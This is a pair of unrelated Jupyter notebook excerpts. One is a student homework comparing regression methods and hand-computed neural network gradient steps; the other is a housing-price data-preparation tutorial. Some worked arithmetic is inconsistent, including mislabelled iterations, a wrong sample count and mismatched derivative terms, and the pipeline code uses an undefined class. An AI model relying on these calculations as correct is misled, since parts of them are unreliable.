x = np.linspace(0, 10, 100)
y = beta.value[1] * x + beta.value[0]
plt.close('all')
plt.plot(x, y, c='red', label='y = ax + b')
plt.title('Fitted line using simple LR')
plt.legend(loc='upper left')
plt.scatter(x=ar[1], y=ar[2], c='blue')
plt.axis('scaled')
plt.show()
```
### Fuzzy Linear Regression
The fuzzy linear regression fit similar to Q2 has been conducted as below. We can see that some spread was estimated for the intercept $A0$ because we are unable to fit the data perfectly this time and there will have to be some spread to cover the data points around the regression line.
```
# Define threshold h (it has same meaning as the alpha in alpha-cut). Higher the h, wider the spread.
h = 0.5
# Define and solve the CVXPY problem.
c = cp.Variable(X_lp.shape[1]) # for spread variables, A0 and A1
alpha = cp.Variable(X_lp.shape[1]) # for center/core variables, A0 and A1
cost = cp.sum(X_lp * c) # define cost function
obj = cp.Minimize(cost) # define objective function
constraints = [c >= 0,
y_lp <= (1 - h) * abs(X_lp) * c + X_lp * alpha, # abs operate on each elements of X_lp
-y_lp <= (1 - h) * abs(X_lp) * c - X_lp * alpha]
prob = cp.Problem(obj, constraints)
prob.solve(solver=cp.CPLEX, verbose=False)
# print("status:", prob.status)
print("\nThe optimal value of loss is:", prob.value)
print("\nThe center of A1 (slope) is:", alpha.value[1],
"\nThe spread of A1 (slope) is:", c.value[1],
"\nThe center of A0 (intercept) is:", alpha.value[0],
"\nThe spread of A0 (intercept) is:", c.value[0])
```
The regression line has been plotted, along with the fuzzy spread.
```
x = np.linspace(0, 10, 100)
y = alpha.value[1] * x + alpha.value[0]
plt.close('all')
plt.plot(x, y, c='red', label='y = A1x + A0')
y = (alpha.value[1] + c.value[1]) * x + alpha.value[0] + c.value[0]
plt.plot(x, y, '--g', label='Fuzzy Spread')
y = (alpha.value[1] - c.value[1]) * x + alpha.value[0] - c.value[0]
plt.plot(x, y, '--g')
plt.title('Fitted line using Fuzzy LR')
plt.legend(loc='upper left')
plt.scatter(x=ar[1], y=ar[2], c='blue')
plt.axis('scaled')
plt.show()
```
### Support Vector Regression
The support vector regression fit similar to Q3 has been conducted as below. Here a simpler version of SVR is used with $\epsilon$ has been set to 1:
$$
minimize \quad \frac{1}{2}||w||^2$$
$$
subject\, to=\left\{
\begin{aligned}
y_i-(w \cdot x_i)-b\le\epsilon\\
(w \cdot x_i)-b\le\epsilon-y_i\le\epsilon\\
\end{aligned}
\right.
$$
The fitted line and the hard margin has been plotted above the training set as well. The estimated $w=0.6$ and $b=1.4$.
```
# A simplified version without introducing the slack variables ξi and ξ*i
epsilon = 1
bw = cp.Variable(X_lp.shape[1]) # for b and w parameters in SVR. bw[0]=b, bw[1]=w
cost = 1 / 2 * bw[1] ** 2
obj = cp.Minimize(cost)
constraints = [
y_lp <= X_lp * bw + epsilon,
-y_lp <= -(X_lp * bw) + epsilon]
prob = cp.Problem(obj, constraints)
prob.solve(solver=cp.CPLEX, verbose=False)
# print("status:", prob.status)
print("\nThe estimate of w is:", bw.value[1],
"\nThe estimate of b is:", bw.value[0], )
upper = X_lp[:, 1] * bw.value[1] + bw.value[0] + epsilon # upper bound of the margin
lower = X_lp[:, 1] * bw.value[1] + bw.value[0] - epsilon # lower bound of the margin
plt.close('all')
x = np.linspace(.5, 6, 100)
y = bw.value[1] * x + bw.value[0]
plt.plot(x, y, c='red', label='y = wx + b')
x = [[min(X_lp[:, 1]), max(X_lp[:, 1])]]
y = [[min(lower), max(lower)]]
for i in range(len(x)):
plt.plot(x[i], y[i], '--g')
y = [[min(upper), max(upper)]]
for i in range(len(x)):
plt.plot(x[i], y[i], '--g', label='margin')
plt.title('Fitted line using SVR')
plt.legend(loc='upper left')
plt.scatter(x=ar[1], y=ar[2], c='blue')
plt.axis('scaled')
plt.show()
```
### Single-layer NN
#### First two iterations illustration
Similar to the Q4,
**For the 1st iteration**, with initial value $w=10$:
$$
\frac{\partial E}{\partial a}=a-T=5(wp_i+1)-T_i\\
\frac{\partial f}{\partial x}=5$$
$$\frac{\partial x_1}{\partial w}=p_1=1$$
$$\vdots$$
$$\frac{\partial x_6}{\partial w}=p_6=6$$
$$\frac{\partial x_7}{\partial w}=p_7=2$$
$$\frac{\partial x_8}{\partial w}=p_8=3$$
For $i=1$,
$$
\frac{\partial E}{\partial a}=a_i-T_i=5(wp_i+1)-T_i=5(10*1+1)-1=54\\
\frac{\partial E}{\partial w}=54*5*1$$
For $i=2$,
$$
\frac{\partial E}{\partial a}=a_i-T_i=5(wp_i+1)-T_i=5(10*2+1)-2=103\\
\frac{\partial E}{\partial w}=103*5*2$$
For $i=3$,
$$
\frac{\partial E}{\partial a}=a_i-T_i=5(wp_i+1)-T_i=5(10*3+1)-3=152\\
\frac{\partial E}{\partial w}=152*5*3$$
For $i=4$,
$$
\frac{\partial E}{\partial a}=a_i-T_i=5(wp_i+1)-T_i=5(10*4+1)-4=201\\
\frac{\partial E}{\partial w}=201*5*4$$
For $i=5$,
$$
\frac{\partial E}{\partial a}=a_i-T_i=5(wp_i+1)-T_i=5(10*5+1)-5=250\\
\frac{\partial E}{\partial w}=250*5*5$$
For $i=6$,
$$
\frac{\partial E}{\partial a}=a_i-T_i=5(wp_i+1)-T_i=5(10*6+1)-6=299\\
\frac{\partial E}{\partial w}=299*5*6$$
For $i=7$,
$$
\frac{\partial E}{\partial a}=a_i-T_i=5(wp_i+1)-T_i=5(10*2+1)-3=102\\
\frac{\partial E}{\partial w}=102*5*2$$
For $i=8$,
$$
\frac{\partial E}{\partial a}=a_i-T_i=5(wp_i+1)-T_i=5(10*3+1)-4=151\\
\frac{\partial E}{\partial w}=151*5*3$$
The sum of gradient for the batch training is:
$$\sum_{i}(\frac{\partial E}{\partial w})=26105
$$
Average the sum of gradient by $N=8$ and the step size (learning rate=0.1) can be calculated as:
$$s_1=0.1*\frac{\sum_{i}(\frac{\partial E}{\partial w})}{N}=326.3125
$$.
The new $w$ and output $a$ is calculated:
$$w=10-326.3125=-316.3125\\
a=[-1576.562, -3158.125, -4739.688, -6321.25 , -7902.812, -9484.375, -3158.125, -4739.688]
$$
**For the 2nd iteration,** similar steps have been conducted as the 1st iteration and:
The sum of gradient for the batch training is:
$$\sum_{i}(\frac{\partial E}{\partial w})=-822307.5
$$
Average the sum of gradient by $N=8$ and the step size (learning rate=0.1) can be calculated as:
$$s_1=0.1*\frac{\sum_{i}(\frac{\partial E}{\partial w})}{N}=-10278.844
$$
The new $w$ and output $a$ is calculated:
$$w=-316.3125-(−10278.844)=9962.531\\
a=[49817.656, 99630.312, 149442.969, 199255.625, 249068.281, 298880.938, 99630.312, 149442.969]
$$
#### Code
Similar to Q4, **We can tell from the above that throughout the first 2 iterations, the updated fit $a$ more and more far away from the actual value. This is because of the learning rate=0.1 was set to be too large and cause the result to be oscillating and won't be able to converge.** Further discussion has been made in Q7 to explore for a proper learning rate in this case.
From the code below, after 30 iterations the loss function value becomes larger and larger and won't be able to converge, which further proves the findings.
```
w, a, gradient = single_layer_NN(lr=0.1, w=10, maxiteration=30)
```
### Two-layer NN
#### First two iterations illustration
The first two iterations calculation is enoughly similar to the Q5.
**For the 1st iteration**,
$$
For\quad i=1, 2, 3, 4, 5, 6, \quad a_1=\frac{1}{1+e^{-(w_1p_i+1)}}\approx1\\
$$
For $i=1:$
$$
\frac{\partial E}{\partial a_2}=a_2-T_i=(w_2a_1+1)-T_i=(10*1+1)-1=10\\
\frac{\partial E}{\partial w_2}=10*1*1=10,\quad \frac{\partial E}{\partial w_1}=10*10*(1-1)*1=0
$$
For $i=2:$
$$
\frac{\partial E}{\partial a_2}=a_2-T_i=(w_2a_1+1)-T_i=(10*1+1)-2=9\\
\frac{\partial E}{\partial w_2}=9*1*1=9,\quad \frac{\partial E}{\partial w_1}=9*10*(1-1)*1=0
$$
For $i=3:$
$$
\frac{\partial E}{\partial a_2}=a_2-T_i=(w_2a_1+1)-T_i=(10*1+1)-3=8\\
\frac{\partial E}{\partial w_2}=8*1*1=8,\quad \frac{\partial E}{\partial w_1}=8*10*(1-1)*1=0
$$
For $i=4:$
$$
\frac{\partial E}{\partial a_2}=a_2-T_i=(w_2a_1+1)-T_i=(10*1+1)-4=7\\
\frac{\partial E}{\partial w_2}=7*1*1=7,\quad \frac{\partial E}{\partial w_1}=7*10*(1-1)*1=0
$$
For $i=5:$
$$
\frac{\partial E}{\partial a_2}=a_2-T_i=(w_2a_1+1)-T_i=(10*1+1)-5=6\\
\frac{\partial E}{\partial w_2}=6*1*1=6,\quad \frac{\partial E}{\partial w_1}=6*10*(1-1)*1=0
$$
For $i=6:$
$$
\frac{\partial E}{\partial a_2}=a_2-T_i=(w_2a_1+1)-T_i=(10*1+1)-6=5\\
\frac{\partial E}{\partial w_2}=5*1*1=5,\quad \frac{\partial E}{\partial w_1}=5*10*(1-1)*1=0
$$
For $i=7:$
$$
\frac{\partial E}{\partial a_2}=a_2-T_i=(w_2a_1+1)-T_i=(10*1+1)-3=8\\
\frac{\partial E}{\partial w_2}=8*1*1=8,\quad \frac{\partial E}{\partial w_1}=5*10*(1-1)*1=0
$$
For $i=8:$
$$
\frac{\partial E}{\partial a_2}=a_2-T_i=(w_2a_1+1)-T_i=(10*1+1)-4=7\\
\frac{\partial E}{\partial w_2}=7*1*1=7,\quad \frac{\partial E}{\partial w_1}=5*10*(1-1)*1=0
$$
The sum of gradient for the batch training is:
$$\sum_{i}(\frac{\partial E}{\partial w_1})=0$$
$$\sum_{i}(\frac{\partial E}{\partial w_2})=10+9+8+7+6+5+8+7=60$$
Average the sum of gradient by $N=8$ and the step size (learning rate=0.1) can be calculated as:
$$s_1=0.1*\frac{\sum_{i}(\frac{\partial E}{\partial w_1})}{N}=0$$
$$s_2=0.1*\frac{\sum_{i}(\frac{\partial E}{\partial w_2})}{N}=0.75$$
The new weight $w_1$, $w_2$ and output $a_1$ and $a_2$ can be calculated. The value of $a_1$ and $a_2$ are both for all 6 observations.
$$
w_1=w_1-s_1=10-0=10,\\
w_2=w_2-s_2=10-0.75=9.25\\
a_1=\frac{1}{1+e^{-(w_1p_i+1)}}\approx1, \quad i\in [1,2,3,4,5,6]\\
a_2=w_2a_1+b=9.25*1+1=10.25
$$
**For the 1st iteration**, similar steps have been conducted as the 1st iteration and:
The sum of gradient for the batch training is:
$$\sum_{i}(\frac{\partial E}{\partial w_1})=0$$
$$\sum_{i}(\frac{\partial E}{\partial w_2})=54$$
Average the sum of gradient by $N=6$ and the step size (learning rate=0.1) can be calculated as:
$$s_1=0.1*\frac{\sum_{i}(\frac{\partial E}{\partial w_1})}{N}=0$$
$$s_2=0.1*\frac{\sum_{i}(\frac{\partial E}{\partial w_2})}{N}=0.675$$
The new weight $w_1$, $w_2$ and output $a_1$ and $a_2$ can be calculated, The value of $a_1$ and $a_2$ are both for all 6 observations:
$$
w_1=w_1-s_1=10-0=10,\\
w_2=w_2-s_2=9.25-0.675=8.575\\
a_1=\frac{1}{1+e^{-(w_1p_i+1)}}\approx1, \quad i\in [1,2,3,4,5,6]\\
a_2=w_2a_1+b=8.575*1+1=9.575
$$
#### Code
Below is the code to estimate all weights using batch training, with the stopping criteria as change in loss function less than 0.0001. We can tell the iteration stopped at Iteration 62 and $w_1=10$ while $w_2=2.51$. We can tell that the $w_1$ hardly changes throughout the iterations. I did not show the first 60 iteration results since it makes the report wordy.
One thing we can tell is, comparing to Q5, the fitted $w_1$ and $w_2$ are almost the same even thought we added two more points to the training set. Also a plot has been given to see how well the 2-layer NN model fit to the 8 sample data points. As we see, they are not fitted well.
```
w1, w2, a1, a2, gradient_1, gradient_2 = linear_activation_NN(C=1, lr=0.1, w1=10, w2=10, maxiteration=100)
# plot the fit
x = np.linspace(-4, 10, 100)
y = w2 * (1 / (1 + np.exp(-(w1 * x + 1)))) + 1
# plt.close('all')
plt.plot(x, y, c='red', label='y = f(w2 * a1 + b)')
plt.title('Fitted line using two-layer NN')
plt.legend(loc='upper left')
plt.scatter(x=ar[1], y=ar[2], c='blue')
plt.xlim((-5, 8))
plt.ylim((-2, 8))
plt.xlabel('x')
plt.ylabel('y')
plt.show()
```
## Q7 Discussion
The detailed comments for Q1, Q2, Q3, Q5 and Q6 have been made in each section respectively. Here the convergence issue in Q4 and Q6 (the Single-layer NN) will be discussed.
### Discussion of Convergence Issue
As mentioned in Q4, throughout the first 2 iterations, the updated fit $a$ more and more far away from the actual value. From the code after running 30 iterations, the loss function value becomes larger and larger and won't be able to converge. This is because of the learning rate=0.1 was set to be too large and cause the result to be oscillating and won't be able to converge. In below, the learning rate has been adjusted to 0.001 and the algorithm converged after 23 iterations with loss function value=`14.423`.
The fit has been plotted against the sample data points.
```
ar = np.array([[1, 1, 1, 1, 1, 1], # intercept
[1, 2, 3, 4, 5, 6], # x
[1, 2, 3, 4, 5, 6]]) # y
# Data preprocessing
X_lp = ar[[0, 1], :].T # transpose the array before modeling
y_lp = ar[2].T
# Learning rate has been adjusted to 0.001
w, a, gradient = single_layer_NN(lr=0.001, w=10, maxiteration=100)
# plot the fit
x = np.linspace(0, 10, 100)
y = 5 * w * x + 5
plt.close('all')
plt.plot(x, y, c='red', label='y = f(wx + b)')
plt.title('Fitted line using single-layer NN')
plt.legend(loc='upper left')
plt.scatter(x=ar[1], y=ar[2], c='blue')
plt.show()
```
The same experiment has been conducted to the convergence issue in Q6 (single-layer NN). As mentioned in Q6, throughout the first 2 iterations, the updated fit $a$ more and more far away from the actual value. From the code after running 30 iterations, the loss function value becomes larger and larger and won't be able to converge. This is because of the learning rate=0.1 was set to be too large and cause the result to be oscillating and won't be able to converge. In below, the learning rate has been adjusted to 0.001 and the algorithm converged after 26 iterations with loss function value=`15.880`.
The fit has been plotted against the sample data points.
```
ar = np.array([[1, 1, 1, 1, 1, 1, 1, 1], # intercept
[1, 2, 3, 4, 5, 6, 2, 3], # x
[1, 2, 3, 4, 5, 6, 3, 4]]) # y
# Data preprocessing
X_lp = ar[[0, 1], :].T # transpose the array before modeling
y_lp = ar[2].T
# Learning rate has been adjusted to 0.001
w, a, gradient = single_layer_NN(lr=0.001, w=10, maxiteration=100)
# plot the fit
x = np.linspace(0, 10, 100)
y = 5 * w * x + 5
plt.close('all')
plt.plot(x, y, c='red', label='y = f(wx + b)')
plt.title('Fitted line using single-layer NN')
plt.legend(loc='upper left')
plt.scatter(x=ar[1], y=ar[2], c='blue')
plt.show()
```
## Q8 Bonus Question
I attempt to add two points aiming at balancing out the effect of the two additional points added in Q6. The (2,1) and (3,2) have been added.
**All four models (Simple Linear Regression, Fuzzy Linear Regression, Support Vector Regression and Single-layer NN) all lead to the same fitted line and they give the same predictions for x = 1, 2, 3, 4, 5, and 6. The prediction results are y = 1, 2, 3, 4, 5, and 6 respectively.**
The training observations look like the graph below.
```
ar = np.array([[1, 1, 1, 1, 1, 1, 1, 1, 1, 1], # intercept
[1, 2, 3, 4, 5, 6, 2, 3, 2, 3], # x
[1, 2, 3, 4, 5, 6, 3, 4, 1, 2]]) # y
# plot the dot points
plt.scatter(x=ar[1], y=ar[2], c='blue')
plt.title('Visualization of training observations')
plt.axis('scaled')
plt.show()
X_lp = ar[[0, 1], :].T # transpose the array before modeling
y_lp = ar[2].T
```
### Simple Linear Regression
For Simple Linear Regression, the same model in Q1 is used. The estimated a is 1 and b is 0:
```
# Define and solve the CVXPY problem.
beta = cp.Variable(X_lp.shape[1]) # return num of cols, 2 in total
cost = cp.sum_squares(X_lp * beta - y_lp) # define cost function
obj = cp.Minimize(cost) # define objective function
prob = cp.Problem(obj)
prob.solve(solver=cp.CPLEX, verbose=False)
# print("status:", prob.status)
print("\nThe optimal value of loss is:", prob.value)
print("\nThe estimated of a (slope) is:", beta.value[1],
"\nThe estimate of b (intercept) is:", beta.value[0])
# Plot the fit
x = np.linspace(0, 10, 100)
y = beta.value[1] * x + beta.value[0]
plt.close('all')
plt.plot(x, y, c='red', label='y = ax + b')
plt.title('Fitted line using simple LR')
plt.legend(loc='upper left')
plt.scatter(x=ar[1], y=ar[2], c='blue')
plt.axis('scaled')
plt.show()
```
### Fuzzy Linear Regression
For Fuzzy Linear Regression, the same model has been used from Q6. The estimated $A0=0$ with spread=2 and $A1=1$ with spread=0.
```
# Define threshold h (it has same meaning as the alpha in alpha-cut). Higher the h, wider the spread.
h = 0.5
# Define and solve the CVXPY problem.
c = cp.Variable(X_lp.shape[1]) # for spread variables, A0 and A1
alpha = cp.Variable(X_lp.shape[1]) # for center/core variables, A0 and A1
cost = cp.sum(X_lp * c) # define cost function
obj = cp.Minimize(cost) # define objective function
constraints = [c >= 0,
y_lp <= (1 - h) * abs(X_lp) * c + X_lp * alpha, # abs operate on each elements of X_lp
-y_lp <= (1 - h) * abs(X_lp) * c - X_lp * alpha]
prob = cp.Problem(obj, constraints)
prob.solve(solver=cp.CPLEX, verbose=False)
# print("status:", prob.status)
print("\nThe optimal value of loss is:", prob.value)
print("\nThe center of A1 (slope) is:", alpha.value[1],
"\nThe spread of A1 (slope) is:", c.value[1],
"\nThe center of A0 (intercept) is:", alpha.value[0],
"\nThe spread of A0 (intercept) is:", c.value[0])
# Plot the FR fit
x = np.linspace(0, 10, 100)
y = alpha.value[1] * x + alpha.value[0]
plt.close('all')
plt.plot(x, y, c='red', label='y = A1x + A0')
y = (alpha.value[1] + c.value[1]) * x + alpha.value[0] + c.value[0]
plt.plot(x, y, '--g', label='Fuzzy Spread')
y = (alpha.value[1] - c.value[1]) * x + alpha.value[0] - c.value[0]
plt.plot(x, y, '--g')
plt.title('Fitted line using Fuzzy LR')
plt.legend(loc='upper left')
plt.scatter(x=ar[1], y=ar[2], c='blue')
plt.axis('scaled')
plt.show()
```
### Support Vector Regression
For Support Vector Regression, the same model has been used from Q6 with $\epsilon$ been set to 1. The estimated $w$ is 1 and $b$ is 0.
```
epsilon = 1
bw = cp.Variable(X_lp.shape[1]) # for b and w parameters in SVR. bw[0]=b, bw[1]=w
cost = 1 / 2 * bw[1] ** 2
obj = cp.Minimize(cost)
constraints = [
y_lp <= X_lp * bw + epsilon,
-y_lp <= -(X_lp * bw) + epsilon]
prob = cp.Problem(obj, constraints)
prob.solve(solver=cp.CPLEX, verbose=False)
# print("status:", prob.status)
print("\nSVR result:")
print("The estimate of w is:", bw.value[1],
"\nThe estimate of b is:", bw.value[0], )
# Plot the SVR fit
upper = X_lp[:, 1] * bw.value[1] + bw.value[0] + epsilon # upper bound of the margin
lower = X_lp[:, 1] * bw.value[1] + bw.value[0] - epsilon # lower bound of the margin
x = np.linspace(.5, 6, 100)
y = bw.value[1] * x + bw.value[0]
plt.plot(x, y, c='red', label='y = wx + b')
x = [[min(X_lp[:, 1]), max(X_lp[:, 1])]]
y = [[min(lower), max(lower)]]
for i in range(len(x)):
plt.plot(x[i], y[i], '--g')
y = [[min(upper), max(upper)]]
for i in range(len(x)):
plt.plot(x[i], y[i], '--g', label='margin')
plt.title('Fitted line using SVR')
plt.legend(loc='upper left')
plt.scatter(x=ar[1], y=ar[2], c='blue')
plt.axis('scaled')
plt.show()
```
### Single-layer NN
For single-layer NN, I use the same structure in Q4 ***with the bias set to 0***. As discussed in Q7, I set the learning rate=0.001 and the algorithm converge at iteration 30. The estimated $w$ is 0.2. The fitted line with the training sample points are plotted.
```
def single_layer_NN(lr, w, maxiteration, bias=1):
"""lr - learning rate\n
w - initial value of w\n
maxiteration - define # of max iteration\n
bias - default is 1 """
E0 = sum(0.5 * np.power((y_lp - 5 * (w * X_lp[:, 1] + bias)), 2)) # initialize Loss, before 1st iteration
for i in range(maxiteration):
if i > 0: # Starting 2nd iteration, E1 value give to E0
E0 = E1 # Loss before iteration
print("Iteration=", i, ",", "Loss value=", E0)
gradient = np.mean((5 * (w * X_lp[:, 1] + bias) - y_lp) * 5 * X_lp[:, 1]) # calculate gradient
step = gradient * lr # calculate step size
w = w - step # refresh the weight
E1 = sum(0.5 * np.power((5 * (w * X_lp[:, 1] + bias) - y_lp), 2)) # Loss after iteration
a = 5 * (w * X_lp[:, 1] + 1) # the refreshed output
if abs(E0 - E1) <= 0.0001:
print('Break out of the loop and end at Iteration=', i,
'\nThe value of loss is:', E1,
'\nThe value of w is:', w)
break
return w, a, gradient
w, a, gradient = single_layer_NN(lr=0.001, w=10, maxiteration=40, bias=0)
# plot the NN fit
x = np.linspace(0, 10, 100)
y = 5 * w * x + 0
plt.close('all')
plt.plot(x, y, c='red', label='y = f(wx + b)')
plt.title('Fitted line using single-layer NN')
plt.legend(loc='upper left')
plt.scatter(x=ar[1], y=ar[2], c='blue')
plt.axis('scaled')
plt.show()
```
|
github_jupyter
|
```
# fetching data online
import os
import tarfile
from six.moves import urllib
DOWNLOAD_ROOT = "https://raw.githubusercontent.com/ageron/handson-ml2/master/"
HOUSING_PATH = os.path.join("datasets", "housing")
HOUSING_URL = DOWNLOAD_ROOT + "datasets/housing/housing.tgz"
def fetch_housing_data(housing_url=HOUSING_URL, housing_path=HOUSING_PATH):
if not os.path.isdir(housing_path):
os.makedirs(housing_path)
tgz_path = os.path.join(housing_path, "housing.tgz")
urllib.request.urlretrieve(housing_url, tgz_path)
housing_tgz = tarfile.open(tgz_path)
housing_tgz.extractall(path=housing_path)
housing_tgz.close()
fetch_housing_data()
import pandas as pd
def load_housing_data(housing_path=HOUSING_PATH):
csv_path = os.path.join(housing_path, "housing.csv")
return pd.read_csv(csv_path)
housing = load_housing_data()
housing.head()
housing.info()
housing["ocean_proximity"].value_counts()
housing.describe()
%matplotlib inline
import matplotlib.pyplot as plt
housing.hist(bins=50, figsize=(20,15))
plt.show()
import numpy as np
def split_train_test (data, test_ratio):
shuffled_indices = np.random.permutation(len(data))
test_set_size = int(len(data) * test_ratio)
test_indices = shuffled_indices[:test_set_size]
train_indices = shuffled_indices[test_set_size:]
return data.iloc[train_indices], data.iloc[test_indices]
train_set, test_set = split_train_test(housing, 0.2)
print(len(train_set))
print(len(test_set))
from zlib import crc32
def test_set_check(identifier, test_ratio):
return crc32(np.int64(identifier)) & 0xffffffff < test_ratio * 2**32
def split_train_test_by_id(data, test_ratio, id_column):
ids = data[id_column]
in_test_set = ids.apply(lambda id_: test_set_check(id_, test_ratio))
return data.loc[~in_test_set], data.loc[in_test_set]
housing_with_id = housing.reset_index() # adds an `index` column
train_set, test_set = split_train_test_by_id(housing_with_id, 0.2, "index")
housing_with_id["id"] = housing["longitude"] * 1000 + housing["latitude"]
train_set, test_set = split_train_test_by_id(housing_with_id, 0.2, "id")
#splitting using sciktlearn
from sklearn.model_selection import train_test_split
train_set, test_set = train_test_split(housing, test_size=0.2, random_state=42)
housing["income_cat"] = pd.cut(housing["median_income"],
bins=[0., 1.5, 3.0, 4.5, 6., np.inf],
labels=[1, 2, 3, 4, 5])
housing['income_cat'].hist()
plt.show()
#stratifield splitting
from sklearn.model_selection import StratifiedShuffleSplit
split = StratifiedShuffleSplit(n_splits=1, test_size=0.2, random_state=42)
for train_index, test_index in split.split(housing, housing["income_cat"]):
strat_train_set = housing.loc[train_index]
strat_test_set = housing.loc[test_index]
strat_test_set["income_cat"].value_counts() / len(strat_test_set)
for set_ in (strat_train_set, strat_test_set):
set_.drop("income_cat", axis=1, inplace=True)
housing = strat_train_set.copy()
housing.plot(kind="scatter", alpha =0.1, x="longitude", y="latitude")
plt.show()
corr_matrix = housing.corr()
corr_matrix
corr_matrix['median_house_value'].sort_values(ascending=False)
plt.subplot()
plt.plot(corr_matrix['median_house_value'], color ='red')
plt.show()
#using pandas's scatter matrix to check for correlation
from pandas.plotting import scatter_matrix
attributes = ["median_house_value", "median_income", "total_rooms", "housing_median_age"]
scatter_matrix(housing[attributes], figsize=(12,8))
plt.show()
housing.plot(kind='scatter', x='median_income', y="median_house_value", alpha=0.1)
plt.show()
housing["rooms_per_household"] = housing["total_rooms"] / housing["households"]
housing["population_per_household"] = housing["population"] / housing["households"]
housing["bedrooms_per_room"] = housing["total_bedrooms"] / housing["total_rooms"]
corr_matrix = housing.corr()
corr_matrix["median_house_value"].sort_values(ascending = False)
#Prepare the Data for Machine Learning Algorithms
housing = strat_train_set.drop("median_house_value", axis=1)
housing_labels = strat_train_set["median_house_value"].copy()
median = housing["total_bedrooms"].median()
```
## Data Cleaning
- Most Machine Learning algorithms cannot work with missing features, so let’s create a few functions to take care of them.
You noticed earlier that the total_bedrooms
attribute has some missing values, so let’s fix this. You have three options:
- Get rid of the corresponding districts.
- Get rid of the whole attribute.
- Set the values to some value (zero, the mean, the median, etc.).
You can accomplish these easily using DataFrame’s dropna(), drop(), and fillna()
methods.
If you choose option 3, you should compute the median value on the training set, and
use it to fill the missing values in the training set, but also don’t forget to save the
median value that you have computed. You will need it later to replace missing values
in the test set when you want to evaluate your system, and also once the system goes
live to replace missing values in new data.
Scikit-Learn provides a handy class to take care of missing values: SimpleImputer.
Here is how to use it. First, you need to create a SimpleImputer instance, specifying
that you want to replace each attribute’s missing values with the median of that
attribute.
However, I won't be dealing with sklearn now because we are yet to treat the library
```
housing.dropna(subset=["total_bedrooms"]) # option 1
housing.drop("total_bedrooms", axis=1) # option 2
median = housing["total_bedrooms"].median() # option 3
housing["total_bedrooms"].fillna(median, inplace=True)
from sklearn.impute import SimpleImputer
housing["total_bedrooms"].fillna(median, inplace=True)
imputer = SimpleImputer(strategy="median")
#I made mistake in this code. I wrote simpler instead of simple
# imputer = SimplerImputer(strategy= "median")
#Since the median can only be computed on numerical attributes, we need to create a
#copy of the data without the text attribute ocean_proximity:
housing_num = housing.drop("ocean_proximity", axis=1)
print(imputer.fit(housing_num))
imputer
#I could have just treat only total_bedrooms attribute that has missing values rather than everything. But we can't be so sure of tomorrow's data
#so let's apply it to everywhere
imputer.statistics_
housing_num.median().values
#transform the values
X = imputer.transform(housing_num)
housing_tr = pd.DataFrame(X, columns=housing_num.columns)
housing_tr
#fit() and transform() what about fit_transform()?
#fit_transform() is saying fit then transform. Fit_transform() method sometimes run faster.
```
## Handling Text and Categorical Attributes
```
# let's us treat ocean_proximity attributes
housing_cat = housing[["ocean_proximity"]]
housing_cat.head(15)
#check for the value counts
housing_cat.value_counts(sort=True)
```
# to convert text attribute to number because machine learning algorithms tends to work better with numbers, we use
- oneht encoding
- Scikit-Learn’s OrdinalEncoder class
- etc
```
from sklearn.preprocessing import OrdinalEncoder
ordinal_encoder = OrdinalEncoder()
ordinal_encoder
housing_cat_encoded = ordinal_encoder.fit_transform(housing_cat)
housing_cat_encoded
ordinal_encoder.categories_
_
```
## Underscore (_) in Python
Difficulty Level : Medium
Last Updated : 22 Nov, 2020
Following are different places where _ is used in Python:
Single Underscore:
In Interpreter
After a name
Before a name
Double Underscore:
__leading_double_underscore
__before_after__
Single Underscore
In Interpreter:
_ returns the value of last executed expression value in Python Prompt/Interpreter
For ignoring values:
Multiple time we do not want return values at that time assign those values to Underscore. It used as throwaway variable.
# Ignore a value of specific location/index
for _ in range(10)
print ("Test")
# Ignore a value when unpacking
a,b,_,_ = my_method(var1)
After a name
Python has their by default keywords which we can not use as the variable name. To avoid such conflict between python keyword and variable we use underscore after name
- snake_case vs camelCase vs PascalCase
```
# One hot encoding
#Our ML algorithm from previous result, 0.,1.,..4. can think 0.1 and 0.2 are close
# to solve this problem, we do dummy variable. To achieve that, scikit- learn provides us with One hot encoding
from sklearn.preprocessing import OneHotEncoder
cat_encoder = OneHotEncoder()
housing_cat_1hot = cat_encoder.fit_transform(housing_cat)
housing_cat_1hot
# Using up tons of memory mostly to store zeros
# would be very wasteful, so instead a sparse matrix only stores the location of the non‐
# 70 | Chapter 2: End-to-End Machine Learning Project
# 21 See SciPy’s documentation for more details.
# zero elements. You can use it mostly like a normal 2D array,21 but if you really want to
# convert it to a (dense) NumPy array, just call the toarray() method:
# get list of categories
housing_cat_1hot.toarray()
```
# Feature Scaling
One of the most important transformations you need to apply to your data is feature
scaling. With few exceptions, Machine Learning algorithms don’t perform well when
the input numerical attributes have very different scales. This is the case for the hous‐
ing data: the total number of rooms ranges from about 6 to 39,320, while the median
incomes only range from 0 to 15. Note that scaling the target values is generally not
required.
There are two common ways to get all attributes to have the same scale: min-max
scaling and standardization.
Min-max scaling (many people call this normalization) is quite simple: values are
shifted and rescaled so that they end up ranging from 0 to 1.#
```
housing_cat
housing
housing.info()
housing.info()
housing["total_rooms"].value_counts().head(100)
housing["median_income"].value_counts().head(100)
```
## feature scaling
### types
- Min-Max /Normalization
- Standarzation
- Min-Max
Min-Max scaler: In this we subtract the Minimum from all values – thereby marking a scale from Min to Max. Then divide it by the difference between Min and Max. The result is that our values will go from zero to 1.
- Standardization is quite different: first it subtracts the mean value (so standardized
values always have a zero mean), and then it divides by the standard deviation so that
the resulting distribution has unit variance. Unlike min-max scaling, standardization
does not bound values to a specific range, which may be a problem for some algo‐
rithms (e.g., neural networks often expect an input value ranging from 0 to 1). How‐
ever, standardization is much less affected by outliers. For example, suppose a district
had a median income equal to 100 (by mistake). Min-max scaling would then crush
all the other values from 0–15 down to 0–0.15, whereas standardization would not be
much affected. Scikit-Learn provides a transformer called StandardScaler for stand‐
ardization.
#### scikit learn handling feature scaling
Scikit-Learn provides a
transformer called MinMaxScaler for this. It has a feature_range hyperparameter
that lets you change the range if you don’t want 0–1 for some reason.
# Transformation Pipelines
```
pip install scikit-learn==2.0
from sklearn.preprocessing import StandardScaler
from sklearn.pipeline import Pipeline
num_pipeline = Pipeline([
('imputer', SimpleImputer(strategy="median")),
('attribs_adder' , CombinedAttributesAdder()),
('std_scaler', StandardScaler()),
])
from sklearn.pipeline import Pipeline
from sklearn.preprocessing import StandardScaler
num_pipeline = Pipeline([('imputer', SimpleImputer(strategy="median")),
('attribs_adder',CombinedAttributesAdder() ),
('std_scaler', StandardScaler()),
])
from sklearn.compose import ColumnTransformer
housing_num
num_attribs = list(housing_num)
cat_attribs = ["ocean_proximity"]
full_pipeline = ColumnTransformer([
("num", num_pipeline, num_attribs),
